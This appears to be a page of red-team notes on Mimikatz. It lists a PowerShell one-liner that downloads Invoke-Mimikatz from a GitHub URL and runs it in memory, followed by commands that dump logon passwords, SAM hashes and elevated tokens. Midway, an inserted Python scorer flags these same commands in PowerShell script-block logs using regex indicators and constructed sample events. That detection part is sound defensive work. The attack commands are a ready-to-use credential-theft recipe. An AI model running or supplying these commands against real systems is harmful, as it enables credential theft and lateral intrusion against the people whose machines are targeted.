Red Teaming And Windows Notes

Mimikatz


Last updated 3 years ago

1) PowerShell.

2) Executable.

PowerShell =>

Invoke-Mimikatz reflectively loads Mimikatz 2.0 into memory using PowerShell. It can dump credentials without writing anything to disk, and it can run any functionality Mimikatz provides.

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds #Dump creds from memory
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
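
A defender-side companion to the commands above, as an added example that is not part of the original notes: since the script runs in memory and writes nothing to disk, PowerShell Script Block Logging (Event ID 4104), when enabled, is the record that still carries the script text. The scorer below runs over constructed events; the indicator weights, threshold, host names and URL are assumptions.

```python
import re

# Indicators come from the commands shown on this page; the weights are assumptions.
INDICATORS = {
    "download_cradle": (re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.S), 2),
    "invoke_mimikatz": (re.compile(r"invoke-mimikatz"), 3),
    "mimikatz_module": (re.compile(
        r"\b(sekurlsa::\w+|lsadump::\w+|privilege::debug|token::elevate)"), 3),
}

def normalize(script_text):
    """Lower-case, drop backtick escapes and join 'a' + 'b' string concatenation."""
    text = script_text.lower().replace("`", "")
    return re.sub(r"['\"]\s*\+\s*['\"]", "", text)

def score_event(event):
    """Return (score, matched indicator names) for one Event ID 4104 record."""
    if event.get("EventID") != 4104:
        return 0, []
    text = normalize(event.get("ScriptBlockText", ""))
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(text)]
    return sum(INDICATORS[name][1] for name in hits), hits

def triage(events, threshold=3):
    """Return (computer, score, hits) for events at or above threshold, highest first."""
    scored = [(e.get("Computer", "?"), *score_event(e)) for e in events]
    return sorted((s for s in scored if s[1] >= threshold), key=lambda s: -s[1])

# Constructed sample events (not real telemetry); host names and URL are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01",
     "ScriptBlockText": "Get-ChildItem C:\\Users | Sort-Object Name"},
    {"EventID": 4104, "Computer": "WS02",
     "ScriptBlockText": "IEX (New-Object System.Net.Webclient).DownloadString("
                        "'https://example.invalid/Invoke-Mimikatz.ps1')"},
    {"EventID": 4104, "Computer": "WS02",
     "ScriptBlockText": "Invoke-Mimikatz -Command "
                        "'\"privilege::debug\" \"sekurlsa::logonpasswords\" \"exit\"'"},
    {"EventID": 4104, "Computer": "WS03",
     "ScriptBlockText": "Inv`oke-Mimi`katz -DumpCreds"},
]

if __name__ == "__main__":
    for computer, score, hits in triage(SAMPLE_EVENTS):
        print(f"{computer}: score={score} indicators={','.join(hits)}")
```

The download cradle scores below the threshold when it appears alone, so it only raises an alert in combination with a Mimikatz indicator.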

Executable =>

privilege::debug
sekurlsa::logonpasswords